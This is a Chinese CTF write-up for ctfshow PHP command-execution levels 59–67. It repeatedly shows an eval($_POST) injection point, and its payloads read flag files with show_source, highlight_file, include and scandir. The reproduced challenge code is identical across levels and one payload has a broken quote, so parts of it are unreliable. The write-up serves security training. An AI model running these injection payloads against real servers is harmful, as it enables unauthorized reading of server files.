CTFshow web(php命令执行59-67）

CTFshow web(php命令执行59-67）

news2024/11/30 6:57:50

web59

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);

payload:c=show_source('flag.php');

我还是那句话：如果不知道对面过滤了啥，那就一个一个尝试

解释：在 PHP 中，show_source() 是一个内置函数，用于打开并显示指定文件的源代码。该函数接受一个文件名作为参数，并将该文件的内容以文本形式进行输出。

下面是我的文章对命令执行常用语句的总结：来源于：一篇文章带你进阶CTF命令执行-CSDN博客

我不想太多，一个个丢进去，看那个可以就是那个

web60

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

这里还是上一个payload：

c=show_source('flag.php');

或者：c=highlight_file('flag.php');

web61

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

这题是真的离谱，这个payload已经一路过关斩将了

c=show_source('flag.php');

当然得换个绕法：

c=include('flag.php);echo $flag;

这里是文件包含然后再输出变量

web62

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web63

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web64

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web65

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web66

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

额，这波被制裁了，不能白嫖了，那就靠实力了！

c=print_r(scandir("/"));

这里首先先翻看根目录，查看源代码，接着发现了flag.txt

c=highlight_file('/flag.txt');

知道flag在根目录下面的flag.txt直接访问就好了

web67

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

还是上面那道题目的方法：

payload:c=highlight_file('/flag.txt');

真诚希望我的文章能够帮助大家,谢谢！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1447666.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

AutoGen实战应用(三)：多代理协作的数据可视化

AutoGen实战应用(三)：多代理协作的数据可视化

之前我完成了关于AutoGen的两篇博客，还没有读过这两篇博客的朋友可以先阅读以下，这样有助于对AutoGen的初步了解： AutoGen实战应用(一)：代码生成、执行和调试_autogen 支持的model-CSDN博客 AutoGen实战应用(二)：多代…

阅读更多...

Imgui(1) | 基于imgui-SFML改进自由落体小球

Imgui(1) | 基于imgui-SFML改进自由落体小球

Imgui(1) | 基于imgui-SFML改进自由落体小球 0. 简介使用 SFML 做2D图形渲染的同时，还想添加一个按钮之类的 GUI Widget, 需要用 Dear Imgui。由于 Imgui 对于2D图形渲染并没有提供类似 SFML 的 API, 结合它们两个使用是一个比较好的方法, 找到了 imgui-SFML 这个…

阅读更多...

nvm 安装nodejs教程【详细】

nvm 安装nodejs教程【详细】

目录一、安装nvm 二、配置镜像三、安装nodejs 安装查看正在用的nodejs版本切换版本一、安装nvm 双击安装包： 无脑下一步即可，当然你可以自定义你自己的安装目录。安装完后，打开环境变量，你会发现nvm为我们自动配置好…

阅读更多...

【51单片机】定时器（江科大）

【51单片机】定时器（江科大）

7.1定时器 1.定时器介绍: 51单片机的定时器属于单片机的内部资源,其电路的连接和运转均在单片机内部完成 2. 定时器作用: (1)用于计时系统,可实现软件计时,或者使程序每隔一固定时间完成一项操作 (2)替代长时间的Delay,提高CPU的运行效率和处理速度定时器在单片机内部就像一个…

阅读更多...

Rust入门：如何在windows + vscode中关闭程序codelldb.exe

Rust入门：如何在windows + vscode中关闭程序codelldb.exe

在windows中用vscode单步调试rust程序的时候，发现无论是按下stop键，还是运行完程序，调试器codelldb.exe一直霸占着主程序不退出，如果此时对代码进行修改，后续就没法再编译调试了。目前我也不知道要怎么处理这个事&am…

阅读更多...

javaspringbootMySQL高考志愿选择系统68335-计算机毕业设计项目选题推荐（附源码）

javaspringbootMySQL高考志愿选择系统68335-计算机毕业设计项目选题推荐（附源码）

目录摘要第1章绪论 1.1 研究背景与意义 1.2 研究现状 1.3论文结构与章节安排第2章相关技术 2.1开发技术 2.2 Java简介 2.3 MVVM模式 2.4 B/S结构 2.5 MySQL数据库 2.6 SpringBoot框架介绍第3章系统分析 3.1 可行性分析 3.2 系统流程分析 3.2.1 数…

阅读更多...

机械革命混合模式和独显直连互相切换

机械革命混合模式和独显直连互相切换

原文：https://blog.iyatt.com/?p13773 默认状态是混合输出，在任务管理器中可以看到两个 GPU，分别是核显和独显从混合模式切换到独显直连可以通过机械革命电竞控制台（重装过系统的需要去官网下载安装驱动） 打开后…

阅读更多...

4核8G服务器支持多少人同时在线访问？

4核8G服务器支持多少人同时在线访问？

腾讯云4核8G服务器支持多少人在线访问？支持25人同时访问。实际上程序效率不同支持人数在线人数不同，公网带宽也是影响4核8G服务器并发数的一大因素，假设公网带宽太小，流量直接卡在入口，4核8G配置的CPU内存也会造成计算…

阅读更多...

$神经网络 | CNN 与 RNN——深度学习主力军$

神经网络 | CNN 与 RNN——深度学习主力军

Hi，大家好，我是半亩花海。本文主要将卷积神经网络（CNN）和循环神经网络（RNN）这两个深度学习主力军进行对比。我们知道，从应用方面上来看，CNN 用于图像识别较多，而 RNN 用于…

阅读更多...

leetcode（数组）128.最长连续序列（c++详细解释）DAY8

leetcode（数组）128.最长连续序列（c++详细解释）DAY8

文章目录 1.题目示例提示 2.解答思路3.实现代码结果 4.总结 1.题目给定一个未排序的整数数组 nums ，找出数字连续的最长序列（不要求序列元素在原数组中连续）的长度。请你设计并实现时间复杂度为 O(n) 的算法解决此问题。示例示例 1&a…

阅读更多...

《UE5_C++多人TPS完整教程》学习笔记14 ——《P15 创建我们自己的子系统（Creating Our Own Subsystem）》

《UE5_C++多人TPS完整教程》学习笔记14 ——《P15 创建我们自己的子系统（Creating Our Own Subsystem）》

本文为B站系列教学视频《UE5_C多人TPS完整教程》 —— 《P15 创建我们自己的子系统（Creating Our Own Subsystem）》的学习笔记，该系列教学视频为 Udemy 课程《Unreal Engine 5 C Multiplayer Shooter》的中文字幕翻译版，UP主&…

阅读更多...

GraphicsMagick 的 OpenCL 开发记录（结语）

GraphicsMagick 的 OpenCL 开发记录（结语）

所有代码及开发记录见：“gm-ocl”。

阅读更多...

Covalent Network与卡尔加里大学建立合作，推动区块链技术创新

Covalent Network与卡尔加里大学建立合作，推动区块链技术创新

Covalent Network（CQT）作为领先的 Web3 数据索引器和提供者，宣布已经与卡尔加里大学达成了具备开创性意义的合作，此次合作标志着推动区块链数据研究和可访问性的重要里程碑。卡尔加里大学是首个以验证者的身份加入 Covalent Net…

阅读更多...

一、部署Oracle

一、部署Oracle

部署Oracle 一、Docker部署1.Oracle11g1.1 测试环境1.1.1 拉取镜像1.1.2 启动容器1.1.3 配置容器环境变量1.1.4 修改sys、system用户密码1.1.5 创建表空间1.1.6 创建用户并授权1.1.5 使用DBeaver测试连接二、安装包部署一、Docker部署 1.Oracle11g 1.1 测试环境当前只能用…

阅读更多...

【分布式技术专题】「Zookeeper中间件」Paxos协议的原理和实际运行中的应用流程分析

【分布式技术专题】「Zookeeper中间件」Paxos协议的原理和实际运行中的应用流程分析

Paxo算法介绍 Paxos算法是莱斯利兰伯特(Leslie Lamport)1990年提出的一种基于消息传递的一致性算法。 Paxos产生背景 Paxos算法是基于消息传递且具有高度容错特性的一致性算法，是目前公认的解决分布式一致性问题最有效的算法之一，其解决的问题就是在分…

阅读更多...

anomalib1.0学习纪实

anomalib1.0学习纪实

回顾：细分、纵深、高端、上游、积累、极致。回顾：资本化，国际化，大干快上，小农思维必死无疑。春节在深圳新地中央，学习anomalib1.0。一、安装： 采用的是如下图的方式： 不过&a…

阅读更多...

专业140+总分420+浙江大学842信号系统与数字电路考研经验电子信息与通信，真题，大纲，参考书。

专业140+总分420+浙江大学842信号系统与数字电路考研经验电子信息与通信，真题，大纲，参考书。

今年考研已经结束，初试专业课842信号系统与数字电路140，总分420，很幸运实现了自己的目标，被浙大录取，这在高考是想都不敢想的学校，在考研时实现了，所以大家也要有信心，通过自己努力实…

阅读更多...

Javaweb之SpringBootWeb案例之propagation属性案例演示的详细解析

Javaweb之SpringBootWeb案例之propagation属性案例演示的详细解析

案例接下来我们就通过一个案例来演示下事务传播行为propagation属性的使用。需求：解散部门时需要记录操作日志由于解散部门是一个非常重要而且非常危险的操作，所以在业务当中要求每一次执行解散部门的操作都需要留下痕迹，就是要记录操作…

阅读更多...

svg基础（十）滤镜-feMerge（多滤镜叠加滤镜）

svg基础（十）滤镜-feMerge（多滤镜叠加滤镜）

feMerge:多滤镜叠加滤镜允许同时应用滤镜效果而不是按顺序应用滤镜效果。利用result存储别的滤镜的输出可以实现这一点，然后在一个 <feMergeNode>子元素中访问它 1 语法 <feMerge><feMergeNode in""></feMergeNode> </feM…

阅读更多...

去除vue自带的边距

去除vue自带的边距

使用vue时发现总有去不掉的外边距，在index.vue里面怎样设置样式都不管用查阅资料后发现要在vue项目自带的index.html文件内添加下面的样式代码才行 <style>*{margin: 0;padding: 0;}body,html{margin: 0;padding: 0;} </style>

阅读更多...

推荐文章

最新文章